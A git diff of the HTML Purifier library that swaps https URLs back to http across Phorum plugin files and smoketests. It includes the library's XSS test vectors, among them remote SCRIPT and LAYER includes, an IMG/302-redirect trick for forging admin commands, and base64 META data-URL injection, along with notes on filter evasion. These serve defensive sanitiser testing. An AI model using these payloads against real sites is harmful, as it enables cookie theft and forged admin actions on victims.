<https://modxcms.com/forums/index.php/topic,25621.msg161970.html> +Purifier. You can check it out here: <http://modxcms.com/forums/index.php/topic,25621.msg161970.html> X. Changelog diff --git a/htmlpurifier-4.10.0/plugins/phorum/INSTALL b/htmlpurifier-4.10.0/plugins/phorum/INSTALL index bb8185d..c8670df 100755 --- a/htmlpurifier-4.10.0/plugins/phorum/INSTALL +++ b/htmlpurifier-4.10.0/plugins/phorum/INSTALL @@ -63,7 +63,7 @@ phorum/ 5. ENABLE --------- -Navigate to your Phorum admin panel at https://example.com/phorum/admin.php, +Navigate to your Phorum admin panel at http://example.com/phorum/admin.php, click on Global Settings > Modules, scroll to "HTML Purifier Phorum Mod" and turn it On. diff --git a/htmlpurifier-4.10.0/plugins/phorum/README b/htmlpurifier-4.10.0/plugins/phorum/README index 850f34a..e433c33 100755 --- a/htmlpurifier-4.10.0/plugins/phorum/README +++ b/htmlpurifier-4.10.0/plugins/phorum/README @@ -40,6 +40,6 @@ set $PHORUM['mod_htmlpurifier']['wysiwyg'] to TRUE if you are using a WYSIWYG editor (you can do this through a common hook or the web configuration form). -Visit HTML Purifier at <https://htmlpurifier.org/>. +Visit HTML Purifier at <http://htmlpurifier.org/>. vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/plugins/phorum/htmlpurifier.php b/htmlpurifier-4.10.0/plugins/phorum/htmlpurifier.php index 5257f60..7196f8f 100755 --- a/htmlpurifier-4.10.0/plugins/phorum/htmlpurifier.php +++ b/htmlpurifier-4.10.0/plugins/phorum/htmlpurifier.php @@ -203,7 +203,7 @@ function phorum_htmlpurifier_quote($array) /** * Ensure that our format hook is processed last. Also, loads the library. - * @credits <https://secretsauce.phorum.org/snippets/make_bbcode_last_formatter.php.txt> + * @credits <http://secretsauce.phorum.org/snippets/make_bbcode_last_formatter.php.txt> */ function phorum_htmlpurifier_common() { diff --git a/htmlpurifier-4.10.0/plugins/phorum/info.txt b/htmlpurifier-4.10.0/plugins/phorum/info.txt index d7b8538..5a5a500 100755 --- a/htmlpurifier-4.10.0/plugins/phorum/info.txt +++ b/htmlpurifier-4.10.0/plugins/phorum/info.txt @@ -1,7 +1,7 @@ title: HTML Purifier Phorum Mod desc: This module enables standards-compliant HTML filtering on Phorum. Please check migrate.bbcode.php before enabling this mod. author: Edward Z. Yang -url: https://htmlpurifier.org/ +url: http://htmlpurifier.org/ version: 4.0.0 hook: format|phorum_htmlpurifier_format diff --git a/htmlpurifier-4.10.0/plugins/phorum/settings/form.php b/htmlpurifier-4.10.0/plugins/phorum/settings/form.php index b5fc7d9..0c795c8 100755 --- a/htmlpurifier-4.10.0/plugins/phorum/settings/form.php +++ b/htmlpurifier-4.10.0/plugins/phorum/settings/form.php @@ -40,7 +40,7 @@ function phorum_htmlpurifier_show_form() however, make the web configuration interface unavailable.</p>'); require_once 'HTMLPurifier/Printer/ConfigForm.php'; - $htmlpurifier_form = new HTMLPurifier_Printer_ConfigForm('config', 'https://htmlpurifier.org/live/configdoc/plain.html#%s'); + $htmlpurifier_form = new HTMLPurifier_Printer_ConfigForm('config', 'http://htmlpurifier.org/live/configdoc/plain.html#%s'); $htmlpurifier_form->setTextareaDimensions(23, 7); // widen a little, since we have space $frm->addMessage($htmlpurifier_form->render( diff --git a/htmlpurifier-4.10.0/plugins/phorum/settings/migrate-sigs.php b/htmlpurifier-4.10.0/plugins/phorum/settings/migrate-sigs.php index 658628b..59838d1 100755 --- a/htmlpurifier-4.10.0/plugins/phorum/settings/migrate-sigs.php +++ b/htmlpurifier-4.10.0/plugins/phorum/settings/migrate-sigs.php @@ -71,7 +71,7 @@ function phorum_htmlpurifier_migrate_sigs($offset) $uri = rtrim(dirname($_SERVER['PHP_SELF']), '/\\'); $extra = 'admin.php?module=modsettings&mod=htmlpurifier&migrate-sigs=' . $offset; // relies on output buffering to work - header("Location: https://$host$uri/$extra"); + header("Location: http://$host$uri/$extra"); exit; } diff --git a/htmlpurifier-4.10.0/smoketests/all.php b/htmlpurifier-4.10.0/smoketests/all.php index db66646..0f3f33d 100755 --- a/htmlpurifier-4.10.0/smoketests/all.php +++ b/htmlpurifier-4.10.0/smoketests/all.php @@ -7,8 +7,8 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>'; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>HTML Purifier: All Smoketests</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> diff --git a/htmlpurifier-4.10.0/smoketests/allConfigForm.php b/htmlpurifier-4.10.0/smoketests/allConfigForm.php index f147ca8..5da05ca 100755 --- a/htmlpurifier-4.10.0/smoketests/allConfigForm.php +++ b/htmlpurifier-4.10.0/smoketests/allConfigForm.php @@ -15,7 +15,7 @@ $gen_config = HTMLPurifier_Config::createDefault(); $printer_config_form = new HTMLPurifier_Printer_ConfigForm( 'config', - 'https://htmlpurifier.org/live/configdoc/plain.html#%s' + 'http://htmlpurifier.org/live/configdoc/plain.html#%s' ); $purifier = new HTMLPurifier($config); @@ -26,8 +26,8 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>'; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <title>HTML Purifier All Config Form smoketest</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> diff --git a/htmlpurifier-4.10.0/smoketests/attrTransform.php b/htmlpurifier-4.10.0/smoketests/attrTransform.php index e998d89..e8a607d 100755 --- a/htmlpurifier-4.10.0/smoketests/attrTransform.php +++ b/htmlpurifier-4.10.0/smoketests/attrTransform.php @@ -4,8 +4,8 @@ require 'common.php'; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>HTML Purifier Attribute Transformation Smoketest</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> diff --git a/htmlpurifier-4.10.0/smoketests/attrTransform.xml b/htmlpurifier-4.10.0/smoketests/attrTransform.xml index 8c08003..97fc98f 100755 --- a/htmlpurifier-4.10.0/smoketests/attrTransform.xml +++ b/htmlpurifier-4.10.0/smoketests/attrTransform.xml @@ -67,7 +67,7 @@ </group> <group title="img.border"> <sample><![CDATA[<img src="img.png" alt="I" border="2" />]]></sample> - <sample><![CDATA[<a href="https://example.com/"><img src="img.png" alt="I" border="2" /></a>]]></sample> + <sample><![CDATA[<a href="http://example.com/"><img src="img.png" alt="I" border="2" /></a>]]></sample> </group> <group title="td,th,hr.width"> <sample><![CDATA[ diff --git a/htmlpurifier-4.10.0/smoketests/basic.php b/htmlpurifier-4.10.0/smoketests/basic.php index d998f30..96d3c78 100755 --- a/htmlpurifier-4.10.0/smoketests/basic.php +++ b/htmlpurifier-4.10.0/smoketests/basic.php @@ -19,11 +19,11 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>'; <?php if ($strict) { ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd"> <?php } else { ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> <?php } ?> <html> <head> @@ -44,8 +44,8 @@ if ($page) { ?> <div style="float:right;"><div><?php echo $strict ? 'Strict' : 'Loose'; ?>: <a href="?d=<?php echo (int) !$strict; ?>&p=<?php echo $page ?>">Swap</a></div> -<a href="https://validator.w3.org/check?uri=referer"><img - src="https://www.w3.org/Icons/valid-xhtml10" +<a href="http://validator.w3.org/check?uri=referer"><img + src="http://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0 Transitional" height="31" width="88" style="border:0;" /></a> </div> <?php diff --git a/htmlpurifier-4.10.0/smoketests/basic/allElements.css b/htmlpurifier-4.10.0/smoketests/basic/allElements.css index 9244f63..1c61193 100755 --- a/htmlpurifier-4.10.0/smoketests/basic/allElements.css +++ b/htmlpurifier-4.10.0/smoketests/basic/allElements.css @@ -7,7 +7,7 @@ div > * {background:#F00; color:#FFF; font-weight:bold; padding:0.2em; margin:0. #module-text abbr, #module-text acronym, #module-text div blockquote, -#module-text blockquote[cite='https://www.example.com'], +#module-text blockquote[cite='http://www.example.com'], #module-text br, #module-text cite, #module-text code, @@ -23,14 +23,14 @@ div > * {background:#F00; color:#FFF; font-weight:bold; padding:0.2em; margin:0. #module-text p, #module-text pre, #module-text span q, -#module-text q[cite='https://www.example.com'], +#module-text q[cite='http://www.example.com'], #module-text samp, #module-text strong, #module-text var, #module-hypertext span a, #module-hypertext a[accesskey='q'], #module-hypertext a[charset='UTF-8'], -#module-hypertext a[href='https://www.example.com/'], +#module-hypertext a[href='http://www.example.com/'], #module-hypertext a[hreflang='en'], #module-hypertext a[rel='nofollow'], #module-hypertext a[rev='index'], diff --git a/htmlpurifier-4.10.0/smoketests/basic/allElements.html b/htmlpurifier-4.10.0/smoketests/basic/allElements.html index 7ae96c6..7995b78 100755 --- a/htmlpurifier-4.10.0/smoketests/basic/allElements.html +++ b/htmlpurifier-4.10.0/smoketests/basic/allElements.html @@ -1,8 +1,8 @@ <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>HTML Purifier All Elements Smoketest</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> @@ -33,7 +33,7 @@ otherwise there will be problems.</p> <abbr>abbr</abbr> <acronym>acronym</acronym> <div><blockquote>blockquote</blockquote></div> - <blockquote cite="https://www.example.com">blockquote@cite</blockquote> + <blockquote cite="http://www.example.com">blockquote@cite</blockquote> <br /> <cite>cite</cite> <code>code</code> @@ -49,7 +49,7 @@ otherwise there will be problems.</p> <p>p</p> <pre>pre</pre> <span><q>q</q></span> - <q cite="https://www.example.com">q@cite</q> + <q cite="http://www.example.com">q@cite</q> <samp>samp</samp> <strong>strong</strong> <var>var</var> @@ -60,7 +60,7 @@ otherwise there will be problems.</p> <span><a>a</a></span>: <a accesskey="q">accesskey</a> <a charset="UTF-8">charset</a> - <a href="https://www.example.com/">href</a> + <a href="http://www.example.com/">href</a> <a hreflang="en">hreflang</a> <a rel="nofollow">rel</a> <a rev="index">rev</a> diff --git a/htmlpurifier-4.10.0/smoketests/basic/legacy.html b/htmlpurifier-4.10.0/smoketests/basic/legacy.html index 4ed8485..3374e8f 100755 --- a/htmlpurifier-4.10.0/smoketests/basic/legacy.html +++ b/htmlpurifier-4.10.0/smoketests/basic/legacy.html @@ -1,8 +1,8 @@ <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>HTML Purifier Legacy Smoketest Test Data</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> diff --git a/htmlpurifier-4.10.0/smoketests/cacheConfig.php b/htmlpurifier-4.10.0/smoketests/cacheConfig.php index 5198043..051bec4 100755 --- a/htmlpurifier-4.10.0/smoketests/cacheConfig.php +++ b/htmlpurifier-4.10.0/smoketests/cacheConfig.php @@ -11,4 +11,4 @@ $serial = $config->serialize(); $result = unserialize($serial); $purifier = new HTMLPurifier($result); -echo htmlspecialchars($purifier->purify('<b>Bold</b><br><i><a href="https://google.com">no</a> formatting</i>')); +echo htmlspecialchars($purifier->purify('<b>Bold</b><br><i><a href="http://google.com">no</a> formatting</i>')); diff --git a/htmlpurifier-4.10.0/smoketests/configForm.php b/htmlpurifier-4.10.0/smoketests/configForm.php index 4c2c18e..bb45556 100755 --- a/htmlpurifier-4.10.0/smoketests/configForm.php +++ b/htmlpurifier-4.10.0/smoketests/configForm.php @@ -40,7 +40,7 @@ if (isset($_GET['doc'])) { ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>HTML Purifier Config Form Smoketest</title> diff --git a/htmlpurifier-4.10.0/smoketests/dataScheme.php b/htmlpurifier-4.10.0/smoketests/dataScheme.php index 5c4d546..533dd4c 100755 --- a/htmlpurifier-4.10.0/smoketests/dataScheme.php +++ b/htmlpurifier-4.10.0/smoketests/dataScheme.php @@ -5,8 +5,8 @@ require_once 'common.php'; echo '<?xml version="1.0" encoding="UTF-8" ?>'; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>HTML Purifier data Scheme Smoketest</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> diff --git a/htmlpurifier-4.10.0/smoketests/extractStyleBlocks.php b/htmlpurifier-4.10.0/smoketests/extractStyleBlocks.php index d6af54f..af04597 100755 --- a/htmlpurifier-4.10.0/smoketests/extractStyleBlocks.php +++ b/htmlpurifier-4.10.0/smoketests/extractStyleBlocks.php @@ -10,7 +10,7 @@ if (file_exists('../test-settings.php')) include '../test-settings.php'; if (!$csstidy_location) { ?> -Error: <a href="https://csstidy.sourceforge.net/">CSSTidy</a> library not +Error: <a href="http://csstidy.sourceforge.net/">CSSTidy</a> library not found, please install and configure <code>test-settings.php</code> accordingly. <?php @@ -29,7 +29,7 @@ $purified_html = $purifier->purify($html); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Extract Style Blocks - HTML Purifier Smoketest</title> diff --git a/htmlpurifier-4.10.0/smoketests/preserveYouTube.php b/htmlpurifier-4.10.0/smoketests/preserveYouTube.php index 88d0c20..4064b08 100755 --- a/htmlpurifier-4.10.0/smoketests/preserveYouTube.php +++ b/htmlpurifier-4.10.0/smoketests/preserveYouTube.php @@ -5,8 +5,8 @@ require_once 'common.php'; echo '<?xml version="1.0" encoding="UTF-8" ?>'; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>HTML Purifier Preserve YouTube Smoketest</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> @@ -15,30 +15,30 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>'; <h1>HTML Purifier Preserve YouTube Smoketest</h1> <?php -$string = '<object width="425" height="350"><param name="movie" value="https://www.youtube.com/v/BdU--T8rLns"></param><param name="wmode" value="transparent"></param><embed src="https://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object> +$string = '<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/BdU--T8rLns"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object> -<object width="416" height="337"><param name="movie" value="https://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc="></param><embed src="https://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc=" type="application/x-shockwave-flash" width="416" height="337"></embed></object> +<object width="416" height="337"><param name="movie" value="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc="></param><embed src="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc=" type="application/x-shockwave-flash" width="416" height="337"></embed></object> -<object width="640" height="385"><param name="movie" value="https://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="https://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object> +<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object> -<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="385" width="480"><param name="width" value="480" /><param name="height" value="385" /><param name="src" value="https://www.youtube.com/p/E37ADDDFCA0FD050&hl=en" /><embed height="385" src="https://www.youtube.com/p/E37ADDDFCA0FD050&hl=en" type="application/x-shockwave-flash" width="480"></embed></object> +<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="385" width="480"><param name="width" value="480" /><param name="height" value="385" /><param name="src" value="http://www.youtube.com/p/E37ADDDFCA0FD050&hl=en" /><embed height="385" src="http://www.youtube.com/p/E37ADDDFCA0FD050&hl=en" type="application/x-shockwave-flash" width="480"></embed></object> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_229z0_gbps1mrs" width="630" height="354" - codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param - name="movie" value="https://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2" + codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param + name="movie" value="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2" /><param name="bgcolor" value="#000000" /><param name="allowScriptAccess" value="always" /><param name="allowFullScreen" value="true" /><param name="flashvars" value="embedType=noscriptObjectTag&embedCode=pteGRrMTpcKMyQ052c8NwYZ5M5FdSV3j" - /><embed src="https://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2" + /><embed src="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2" bgcolor="#000000" width="630" height="354" name="ooyalaPlayer_229z0_gbps1mrs" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za" - pluginspage="https://www.adobe.com/go/getflashplayer"></embed></object> + pluginspage="http://www.adobe.com/go/getflashplayer"></embed></object> '; $regular_purifier = new HTMLPurifier(); diff --git a/htmlpurifier-4.10.0/smoketests/printDefinition.php b/htmlpurifier-4.10.0/smoketests/printDefinition.php index d483ff2..8db15f8 100755 --- a/htmlpurifier-4.10.0/smoketests/printDefinition.php +++ b/htmlpurifier-4.10.0/smoketests/printDefinition.php @@ -21,15 +21,15 @@ $printer_css_definition->prepareGenerator($gen_config); $printer_config_form = new HTMLPurifier_Printer_ConfigForm( 'config', - 'https://htmlpurifier.org/live/configdoc/plain.html#%s' + 'http://htmlpurifier.org/live/configdoc/plain.html#%s' ); echo '<?xml version="1.0" encoding="UTF-8" ?>'; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <title>HTML Purifier Printer Smoketest</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> diff --git a/htmlpurifier-4.10.0/smoketests/variableWidthAttack.php b/htmlpurifier-4.10.0/smoketests/variableWidthAttack.php index 73fb4ca..4e2c4b4 100755 --- a/htmlpurifier-4.10.0/smoketests/variableWidthAttack.php +++ b/htmlpurifier-4.10.0/smoketests/variableWidthAttack.php @@ -5,7 +5,7 @@ require_once 'common.php'; echo '<?xml version="1.0" encoding="UTF-8" ?>'; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>HTML Purifier Variable Width Attack Smoketest</title> @@ -14,7 +14,7 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>'; <body> <h1>HTML Purifier Variable Width Attack Smoketest</h1> <p>For more information, see -<a href="https://applesoup.googlepages.com/bypass_filter.txt">Cheng Peng Su's +<a href="http://applesoup.googlepages.com/bypass_filter.txt">Cheng Peng Su's original advisory.</a> This particular exploit code appears only to work in Internet Explorer, if it works at all.</p> <h2>Test</h2> diff --git a/htmlpurifier-4.10.0/smoketests/xssAttacks.php b/htmlpurifier-4.10.0/smoketests/xssAttacks.php index 00b3056..6468382 100755 --- a/htmlpurifier-4.10.0/smoketests/xssAttacks.php +++ b/htmlpurifier-4.10.0/smoketests/xssAttacks.php @@ -18,7 +18,7 @@ function formatCode($string) ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>HTML Purifier XSS Attacks Smoketest</title> @@ -34,7 +34,7 @@ function formatCode($string) <body> <h1>HTML Purifier XSS Attacks Smoketest</h1> <p>XSS attacks are from -<a href="https://ha.ckers.org/xss.html">https://ha.ckers.org/xss.html</a>.</p> +<a href="http://ha.ckers.org/xss.html">http://ha.ckers.org/xss.html</a>.</p> <p><strong>Caveats:</strong> <tt>Google.com</tt> has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area diff --git a/htmlpurifier-4.10.0/smoketests/xssAttacks.xml b/htmlpurifier-4.10.0/smoketests/xssAttacks.xml index e57ce9f..d90f457 100755 --- a/htmlpurifier-4.10.0/smoketests/xssAttacks.xml +++ b/htmlpurifier-4.10.0/smoketests/xssAttacks.xml @@ -30,7 +30,7 @@ </attack> <attack> <name>SCRIPT w/Source File</name> - <code><SCRIPT SRC=https://ha.ckers.org/xss.js></SCRIPT></code> + <code><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code> <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc> <label>Basic XSS Attacks</label> @@ -174,7 +174,7 @@ </attack> <attack> <name>IMG Embedded commands 1</name> - <code><IMG SRC="https://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code> + <code><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code> <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc> <label>HTML Element Attacks</label> @@ -183,8 +183,8 @@ </attack> <attack> <name>IMG Embedded commands 2</name> - <code>Redirect 302 /a.jpg https://victimsite.com/admin.asp&deleteuser</code> - <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="https://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc> + <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code> + <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -220,7 +220,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>LAYER</name> - <code><LAYER SRC="https://ha.ckers.org/scriptlet.html"></LAYER></code> + <code><LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER></code> <desc>Layer (Older Netscape only)</desc> <label>HTML Element Attacks</label> @@ -239,7 +239,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ <attack> <name>US-ASCII encoding</name> <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code> - <desc>Found by Kurt Huwig https://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc> + <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>]</browser> @@ -256,7 +256,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ <attack> <name>META w/data:URL</name> <code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code> - <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see https://www.ietf.org/rfc/rfc2397.txt for more details</desc> + <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -264,8 +264,8 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>META w/additional URL parameter</name> - <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=https://;URL=javascript:alert('XSS');"></code> - <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "https://" you can evade it with the following technique (Submitted by Moritz Naumann https://www.moritz-naumann.com)</desc> + <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code> + <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> @@ -282,7 +282,7 @@ 